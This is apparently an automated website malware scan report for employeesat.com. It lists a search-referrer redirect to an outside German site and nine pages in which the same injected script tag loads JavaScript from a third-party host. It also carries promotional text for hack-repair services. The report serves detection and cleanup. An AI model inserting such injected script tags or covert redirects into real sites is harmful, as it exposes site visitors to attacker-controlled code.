New scan:

Malware Scanner report for employeesat.com

Malicious/Suspicious/Total urls checked
0/9/11
9 pages have suspicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://bikesport-stuttgart.de/hmoj.html
54 websites infected.

The website "employeesat.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://employeesat.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: employeesat.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Tue, 09 Sep 2014 22:51:23 GMT
Location: http://bikesport-stuttgart.de/hmoj.html
Server: Apache
Content-Length: 288
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://employeesat.com/
200 OK
Content-Length: 2809
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/default.html
200 OK
Content-Length: 2809
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/company-info.html
200 OK
Content-Length: 2132
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/anonymity.html
200 OK
Content-Length: 1716
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/customer-comments.html
200 OK
Content-Length: 5305
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/questionnaire.html
200 OK
Content-Length: 3043
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/reports.html
200 OK
Content-Length: 2267
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/pricing.html
200 OK
Content-Length: 2047
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/faq.html
200 OK
Content-Length: 3900
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://blog.yegan.com/top.php"></script>

http://employeesat.com/test404page.js
404 Not Found
Content-Length: 2674
Content-Type: text/html
clean
http://cdn.dsultra.com/js/registrar.js
200 OK
Content-Length: 1652
Content-Type: application/x-javascript
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=employeesat.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://employeesat.com/

Result: employeesat.com is not infected or malware details are not published yet.